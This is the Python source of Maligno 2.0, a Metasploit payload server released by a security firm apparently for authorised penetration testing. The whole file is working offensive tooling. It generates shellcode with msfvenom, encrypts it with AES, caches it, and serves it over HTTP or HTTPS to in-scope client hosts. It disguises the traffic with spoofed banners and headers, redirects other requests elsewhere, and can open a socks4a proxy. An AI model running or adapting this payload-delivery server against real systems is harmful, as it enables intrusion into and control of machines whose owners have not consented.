#!/usr/bin/python

################################################################
#                                                              #
# Maligno - A Metasploit payload server                        #
# written by Juan J. Guelfo @ Encripto AS                      #
# post@encripto.no                                             #
#                                                              #
# Copyright 2013-2015 Encripto AS. All rights reserved.        #
#                                                              #
# Maligno is licensed under the FreeBSD license.               #
# http://www.freebsd.org/copyright/freebsd-license.html        #
#                                                              #
################################################################


import os, sys, ssl, time, signal, threading
import libs.malcfg, libs.malout, libs.malnet, libs.malpay
from Crypto.Cipher import AES
from datetime import datetime
from BaseHTTPServer import BaseHTTPRequestHandler
from BaseHTTPServer import HTTPServer
from SocketServer import ThreadingMixIn


__version__ = "2.0"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"


class HTTPHandler(BaseHTTPRequestHandler):

    def do_GET(self):
        self.server_version = profile_response_config["banner"]
        self.sys_version = ""

        if profile_response_config["protocol"].upper() == "HTTP/1.1":
            self.protocol_version = "HTTP/1.1"

        print "==================================================================="
        print "\n[{0}]\n".format(datetime.now().strftime("%d/%m/%y - %H:%M:%S"))
        libs.malout.print_info("New request from %s..." % self.client_address[0])

        # If the request came from a host in scope, then process it
        if (self.client_address[0] in scope_config) or ("ANY" in scope_config):
            try:

                # The server should process requests with a certain URL parameter
                # It does not matter what path the client requested, as long as it contains the parameter
                payload_id = libs.malnet.get_payload_id_from_path(self.path, profile_request_config["parameter"])

                # Select cache file
                cache_path = libs.malnet.get_cache_file_path(payload_id, metasploit_config["cachefolder"], default_file)

                # Retrieve from cache
                package = ""
                print ""
                libs.malout.print_info("Reading packed shellcode from %s..." % cache_path)
                package = libs.malout.read_package_from_cache(cache_path)

                # Send the encrypted / encoded payload to the client
                print ""
                self.send_response(200)
                if profile_server_header_config:
                    for header in profile_server_header_config:
                        if header:
                            if str(header["field"]).rstrip().lstrip().upper() == "TRANSFER-ENCODING" and str(header["value"]).rstrip().lstrip().upper() == "CHUNKED":
                                #Mispelling in order to avoid chunked responses
                                self.send_header(str(header["field"]).rstrip().lstrip(), "chuncked")
                            else:
                                self.send_header(str(header["field"]).rstrip().lstrip(), str(header["value"]).rstrip().lstrip())

                        else:
                            print ""
                            libs.malout.print_error("There was a problem while parsing one of the server headers. Ingnoring it...\n")

                if profile_response_config["protocol"].upper() == "HTTP/1.1":
                    self.send_header("Content-length", len(package))

                self.end_headers()
                self.wfile.write(package)
                print ""
                libs.malout.print_ok("Package sent!")

            except ValueError:
                print ""
                libs.malout.print_error("Request with unexpected format!")
                libs.malout.print_info("Redirecting to last resort...\n")
                self.send_response(301)
                self.send_header("Location", profile_response_config["lastresort"])
                self.end_headers()

            except TypeError:
                print ""
                libs.malout.print_error("Request with unexpected format!")
                libs.malout.print_info("Redirecting to last resort...\n")
                self.send_response(301)
                self.send_header("Location", profile_response_config["lastresort"])
                self.end_headers()

        else:
            print ""
            libs.malout.print_error("Host not in scope!")
            libs.malout.print_info("Redirecting to last resort...\n")
            self.send_response(301)
            self.send_header("Location", profile_response_config["lastresort"])
            self.end_headers()

        print ""
        libs.malout.print_info("End of request\n")
        print "==================================================================="
        return


    def do_POST(self):
        self.server_version = profile_response_config["banner"]
        self.sys_version = ""

        if profile_response_config["protocol"].upper() == "HTTP/1.1":
            self.protocol_version = "HTTP/1.1"

        print "==================================================================="
        print "\n[{0}]\n".format(datetime.now().strftime("%d/%m/%y - %H:%M:%S"))
        libs.malout.print_info("New request from %s..." % self.client_address[0])

        # If the request came from a host in scope, then process it
        if (self.client_address[0] in scope_config) or ("ANY" in scope_config):
            try:

                # The server should process requests with a certain POST parameter
                # It does not matter what path the client requested, as long as it contains the parameter
                if self.headers.has_key('content-length'):
                    content_length = int(self.headers.getheader('content-length', 0))
                    post_body = self.rfile.read(content_length)
                else:
                    raise ValueError

                payload_id = libs.malnet.get_payload_id_from_body(post_body, profile_request_config["parameter"])

                # Select cache file
                cache_path = libs.malnet.get_cache_file_path(payload_id, metasploit_config["cachefolder"], default_file)

                # Retrieve from cache
                package = ""
                print ""
                libs.malout.print_info("Reading packed shellcode from %s..." % cache_path)
                package = libs.malout.read_package_from_cache(cache_path)

                # Send the encrypted / encoded payload to the client
                print ""
                self.send_response(200)
                if profile_server_header_config:
                    for header in profile_server_header_config:
                        if header:
                            if str(header["field"]).rstrip().lstrip().upper() == "TRANSFER-ENCODING" and str(header["value"]).rstrip().lstrip().upper() == "CHUNKED":
                                #Mispelling in order to avoid chunked responses
                                self.send_header(str(header["field"]).rstrip().lstrip(), "chuncked")
                            else:
                                self.send_header(str(header["field"]).rstrip().lstrip(), str(header["value"]).rstrip().lstrip())

                        else:
                            print ""
                            libs.malout.print_error("There was a problem while parsing one of the server headers. Ingnoring it...\n")

                if profile_response_config["protocol"].upper() == "HTTP/1.1":
                    self.send_header("Content-length", len(package))

                self.end_headers()
                self.wfile.write(package)
                print ""
                libs.malout.print_ok("Package sent!")

            except ValueError:
                print ""
                libs.malout.print_error("Request with unexpected format!")
                libs.malout.print_info("Redirecting to last resort...\n")
                self.send_response(301)
                self.send_header("Location", profile_response_config["lastresort"])
                self.end_headers()

            except TypeError:
                print ""
                libs.malout.print_error("Request with unexpected format!")
                libs.malout.print_info("Redirecting to last resort...\n")
                self.send_response(301)
                self.send_header("Location", profile_response_config["lastresort"])
                self.end_headers()

        else:
            print ""
            libs.malout.print_error("Host not in scope!")
            libs.malout.print_info("Redirecting to last resort...\n")
            self.send_response(301)
            self.send_header("Location", profile_response_config["lastresort"])
            self.end_headers()

        print ""
        libs.malout.print_info("End of request\n")
        print "==================================================================="
        return

    def do_HEAD(self):
        self.server_version = profile_response_config["banner"]
        self.sys_version = ""

        if profile_response_config["protocol"].upper() == "HTTP/1.1":
            self.protocol_version = "HTTP/1.1"

        print "==================================================================="
        print "\n[{0}]\n".format(datetime.now().strftime("%d/%m/%y - %H:%M:%S"))
        libs.malout.print_info("New request from %s..." % self.client_address[0])

        # If the request came from a host in scope, then process it
        if (self.client_address[0] in scope_config) or ("ANY" in scope_config):
            try:

                # The server should process requests with a certain URL parameter
                # It does not matter what path the client requested, as long as it contains the parameter
                payload_id = libs.malnet.get_payload_id_from_path(self.path, profile_request_config["parameter"])

                # Select cache file
                cache_path = libs.malnet.get_cache_file_path(payload_id, metasploit_config["cachefolder"], default_file)

                # Retrieve from cache
                package = ""
                print ""
                libs.malout.print_info("Reading packed shellcode from %s..." % cache_path)
                package = libs.malout.read_package_from_cache(cache_path)

                # Send the encrypted / encoded payload to the client
                print ""
                self.send_response(200)
                if profile_server_header_config:
                    for header in profile_server_header_config:
                        if header:
                            if str(header["field"]).rstrip().lstrip().upper() == "TRANSFER-ENCODING" and str(header["value"]).rstrip().lstrip().upper() == "CHUNKED":
                                #Mispelling in order to avoid chunked responses
                                self.send_header(str(header["field"]).rstrip().lstrip(), "chuncked")
                            else:
                                self.send_header(str(header["field"]).rstrip().lstrip(), str(header["value"]).rstrip().lstrip())

                        else:
                            print ""
                            libs.malout.print_error("There was a problem while parsing one of the server headers. Ingnoring it...\n")

                if profile_response_config["protocol"].upper() == "HTTP/1.1":
                    self.send_header("Content-length", len(package))

                self.send_header("Content-MD5", package)
                self.end_headers()

                print ""
                libs.malout.print_ok("Package sent!")

            except ValueError:
                print ""
                libs.malout.print_error("Request with unexpected format!")
                libs.malout.print_info("Redirecting to last resort...\n")
                self.send_response(301)
                self.send_header("Location", profile_response_config["lastresort"])
                self.end_headers()

            except TypeError:
                print ""
                libs.malout.print_error("Request with unexpected format!")
                libs.malout.print_info("Redirecting to last resort...\n")
                self.send_response(301)
                self.send_header("Location", profile_response_config["lastresort"])
                self.end_headers()

        else:
            print ""
            libs.malout.print_error("Host not in scope!")
            libs.malout.print_info("Redirecting to last resort...\n")
            self.send_response(301)
            self.send_header("Location", profile_response_config["lastresort"])
            self.end_headers()

        print ""
        libs.malout.print_info("End of request\n")
        print "==================================================================="
        return


class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
    pass


if __name__ == '__main__':

    libs.malout.print_header(__version__, __author__)

    server_config_file = "server_config.xml"
    metasploit_config = libs.malcfg.get_metasploit_config(server_config_file)
    payload_config = libs.malcfg.get_payload_config(server_config_file)
    scope_config = libs.malcfg.get_scope_config(server_config_file)
    server_config = libs.malcfg.get_server_config(server_config_file)

    profile_request_config = libs.malcfg.get_profile_request_config(server_config["profile"])
    profile_response_config = libs.malcfg.get_profile_response_config(server_config["profile"])
    profile_server_header_config = libs.malcfg.get_profile_server_header_config(server_config["profile"])
    profile_network_config = libs.malcfg.get_profile_network_config(server_config["profile"])
    profile_client_config = libs.malcfg.get_profile_client_config(server_config["profile"])
    profile_client_header_config = libs.malcfg.get_profile_client_header_config(server_config["profile"])

    index = 0
    generated = 0
    cipher = AES.new(profile_network_config["secret"])

    for msfpayload in payload_config:
        index += 1
        libs.malout.print_info("Generating and caching shellcodes: %s of %s..." % (index, len(payload_config)))
        payload_generated = False
        while not payload_generated:

            try:
                package = ""
                default_file = "default"
                cache_file = str(msfpayload["id"])
                libs.malout.print_info("Generating msf resource file for %s...\n" % msfpayload["payload"])
                libs.malout.generate_resource_file(server_config, metasploit_config, profile_response_config, profile_client_header_config, msfpayload)
                libs.malout.print_info("Generating %s with msfvenom...\n" % msfpayload["payload"])
                shellcode = libs.malpay.generate_shellcode(metasploit_config, server_config, msfpayload)
                package = libs.malpay.pack_data(shellcode, cipher, profile_network_config, profile_response_config)
                libs.malout.store_package_in_cache(metasploit_config["cachefolder"], cache_file, default_file, package)

                generated += 1
                payload_generated = True

            except IndexError:
                c = ""
                options = ["Y", "N", "y", "n"]
                while c not in options:
                    time.sleep(0.5)

                    print ""
                    libs.malout.print_error("There was a problem generating the payload with msfvenom.")
                    c = raw_input("    Would you like to retry? [Y/N]: ")

                    if c.upper() == "N":
                        payload_generated = True

                    elif c.upper() == "Y":
                        print ""

        libs.malout.print_header(__version__, __author__)

    libs.malout.print_info("Starting Maligno...")

    if not generated:
        libs.malout.print_error("No shellcode has been generated.")
        libs.malout.print_error("Maligno cannot continue without shellcodes.\n")
        libs.malout.print_error("Tip: Too many errors with msfvenom?")
        libs.malout.print_error("Try to reduce the number of iterations and/or bad chars in your config file.\n")
        sys.exit()

    libs.malout.print_info("Checking for updates...")
    libs.malnet.check_for_updates(__version__)

    try:
        server = None
        if server_config["threading"].upper() in ["TRUE"]:
            server = ThreadedHTTPServer(('', int(server_config["port"])), HTTPHandler)
            libs.malout.print_info("Server multithreading support enabled...")

        else:
            server = HTTPServer(('', int(server_config["port"])), HTTPHandler)
            libs.malout.print_info("Server multithreading support disabled...")

        # If ssl is enabled, try to locate the SSL cert file
        if server_config["ssl"].upper() in ["TRUE"]:
            cert = open(server_config["sslcert"], 'r')
            cert.close()
            server.socket = ssl.wrap_socket (server.socket, certfile=server_config["sslcert"], server_side=True)
            libs.malout.print_info("SSL certificate file found. SSL enabled...")

        # Start proxy if enabled
        if server_config["proxy"].upper() in ["TRUE"]:
            print ""
            libs.malout.print_info("Starting Metasploit socks4a proxy...")
            proxy_process = libs.malnet.start_socks_proxy(metasploit_config, server_config["proxyport"])
            libs.malout.print_info("Proxy listening on port TCP %s...\n" % server_config["proxyport"])

        libs.malout.print_info("Server profile \"%s\" loaded...\n" % server_config["profile"].split('/')[-1])
        libs.malout.print_info("Need help?")
        libs.malout.print_ok("Watch the Maligno Video Series - http://bit.ly/1vWDfR5\n")
        libs.malout.print_info("Maligno is up and running. Press CTRL+C to stop...\n")
        server.serve_forever()

    except ValueError:
        libs.malout.print_error("A valid port must be provided in server config.\n")
        pass

    except IOError as e:
        if e.errno == 2:
            libs.malout.print_error("Could not find SSL certificate %s. Does the file exist?\n" % server_config["sslcert"])
            libs.malout.print_info("Tips: Run the installation file 'install.sh' in order to generate a self-signed certificate.")
            libs.malout.print_info("      Do not forget to check your server config as well.")

        else:
            libs.malout.print_error("Error: %s...\n" % e.strerror)

        sys.exit()

    except KeyboardInterrupt:

        # Remove cache files when interrupted
        print ""
        libs.malout.print_info("Removing cache files...")
        filelist = [ f for f in os.listdir(metasploit_config["cachefolder"]) ]
        for f in filelist:
            path = "%s/%s" % (metasploit_config["cachefolder"], f)
            os.remove(path)

        # Remove resource files when interrupted
        libs.malout.print_info("Removing resource files...")
        filelist = [ f for f in os.listdir(metasploit_config["resourcefolder"]) ]
        for f in filelist:
            path = "%s/%s" % (metasploit_config["resourcefolder"], f)
            os.remove(path)

        # Stop proxy process if active
        if server_config["proxy"].upper() in ["TRUE"]:
            libs.malout.print_info("Stopping socks4a proxy (PID: %s)..." % proxy_process.pid)
            try:
                os.killpg(proxy_process.pid, signal.SIGTERM)

            except OSError:
                libs.malout.print_info("Process already killed...")

        libs.malout.print_info("Stopping Maligno...\n")
        time.sleep(1)
        os.system("reset")
        sys.exit()